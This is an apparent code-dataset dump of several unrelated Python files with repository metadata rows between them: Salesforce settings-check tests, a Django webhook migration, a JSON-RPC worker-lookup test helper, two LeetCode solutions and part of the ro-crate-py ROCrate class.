f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| 23.867257
| 121
| 0.599184
|
from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| true
| true
|
f718f9f194730e615e7ec9ce3e7cb3a576ea5bd8
| 264
|
py
|
Python
|
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
"""
Dimension
"""
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| 12
| 33
| 0.734848
|
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| true
| true
|
f718fa636465cb39461b7969d2924c94c71ba30c
| 814
|
py
|
Python
|
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | 3
|
2021-07-29T16:27:49.000Z
|
2021-11-12T15:39:42.000Z
|
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | null | null | null |
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.5 on 2021-09-21 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| 33.916667
| 117
| 0.608108
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| true
| true
|
f718fa9de893038d5ae56ecc48f2dcaf85abea50
| 2,969
|
py
|
Python
|
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| 31.924731
| 77
| 0.613675
|
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| true
| true
|
f718fb16220b88d0cf774ed5e6300836f3128f5c
| 1,055
|
py
|
Python
|
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
"""Return the max sliding window of size 'k' on 'nums'."""
maxWindow = []
# Keep track of the indices of the 'max' candidates.
# Elements are guaranteed to be in decreasing order.
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
# Discard any maximum values not in scope of the window.
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# Discard any values smaller than 'num', as they won't be
# considered 'max candidates since 'num' is larger and also
# in the same window scope.
maxIdxs.pop()
maxIdxs.append(i)
# Sliding window for 'nums' begin at index 'k-1', i.e. where
# the window sees the first 'k' numbers.
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow
| 31.969697
| 71
| 0.602844
|
from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
maxWindow = []
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# considered 'max candidates since 'num' is larger and also
maxIdxs.pop()
maxIdxs.append(i)
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow
| true
| true
|
f718fb322a11e301def104bf6bbcf5c5efdc385b
| 1,066
|
py
|
Python
|
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | 1
|
2020-12-02T13:54:30.000Z
|
2020-12-02T13:54:30.000Z
|
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | null | null | null |
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | null | null | null |
"""
1. Clarification
2. Possible solutions
- Prefix Hash
- Trie
3. Coding
4. Tests
"""
# T=O(sigma(wi^2)), S=O(n), wi=len(i-th word)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
# T=O(n), S=O(n)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| 26.65
| 72
| 0.54878
|
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| true
| true
|
f718fb6285f131a554f6e66796002cf04bdb687c
| 16,091
|
py
|
Python
|
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
] | null | null | null |
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
] | null | null | null |
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
# TODO: add this as @base in the context? At least when loading
# from zip
self.uuid = uuid.uuid4()
# TODO: default_properties must include name, description,
# datePublished, license
if not source_path or not load_preview:
# create preview entity and add it to default_entities
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
# create a new ro-crate
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
# load an existing ro-crate
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
# TODO: load root dataset properties
def entities_from_metadata(self, metadata_path):
# Creates a dictionary {id: entity} from the metadata file
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
# TODO: should validate the json-ld
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
# print(entity)
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
"""Find Metadata file and Root Data Entity in RO-Crate.
Returns a tuple of the @id identifiers (metadata, root)
"""
# Note that for all cases below we will deliberately
# throw KeyError if "about" exists but it has no "@id"
# First let's try conformsTo algorithm in
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
# add data and contextual entities to the crate
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
# remove hasPart and id from root_entity and add the rest of the
# properties to the build
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
# check if a preview is present
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
# iterate over data entities
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
# print(data_entity_id)
entity = entities[data_entity_id]
# basic checks should be moved to a separate function
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
# Data entities can have an array as @type. So far we just parse
# them as File class if File is in the list. For further
# extensions (e.g if a Workflow class is created) we can add extra
# cases or create a mapping table for specific combinations. See
# https://github.com/ResearchObject/ro-crate/issues/83
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
# referencing a file path relative to crate-root
instance = File(self, file_path, identifier, properties=entity)
else:
# check if it is a valid absolute URI
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
# the rest of the entities must be contextual entities
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
# should this be done in the extract entities?
entity.pop('@id', None)
# contextual entities should not have @type array
# (see https://github.com/ResearchObject/ro-crate/issues/83)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
# TODO: add contextual entities
# def add_contact_point(id, properties = {})
# def add_organization(id, properties = {})
# add properties: name datePublished author license identifier
# distribution contactPoint publisher funder description url hasPart.
# publisher should be an Organization though it MAY be a Person. funder
# should reference an Organization
@property
def name(self):
return self.root_dataset['name']
@name.setter
def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
# source: file object or path (str)
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
# if file in data_entities:
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
# if file in data_entities:
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
################################
# Contextual entities #
################################
def _add_context_entity(self, entity):
if entity in self.contextual_entities:
self.contextual_entities.remove(entity)
self.contextual_entities.append(entity)
def add_person(self, identifier=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
new_person = Person(self, identifier, props)
self._add_context_entity(new_person)
return new_person
# TODO
# def fetch_all(self):
# fetch all files defined in the crate
# write crate to local dir
def write_crate(self, base_path):
Path(base_path).mkdir(parents=True, exist_ok=True)
# write data entities
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write(base_path)
def write_zip(self, out_zip):
if str(out_zip).endswith('.zip'):
out_file_path = out_zip
else:
out_file_path = out_zip + '.zip'
zf = zipfile.ZipFile(
out_file_path, 'w', compression=zipfile.ZIP_DEFLATED,
allowZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| 37.42093
| 136
| 0.618358
|
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
self.uuid = uuid.uuid4()
if not source_path or not load_preview:
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
def entities_from_metadata(self, metadata_path):
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
entity = entities[data_entity_id]
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
instance = File(self, file_path, identifier, properties=entity)
else:
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
entity.pop('@id', None)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
@property
def name(self):
return self.root_dataset['name']
@name.setter
def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
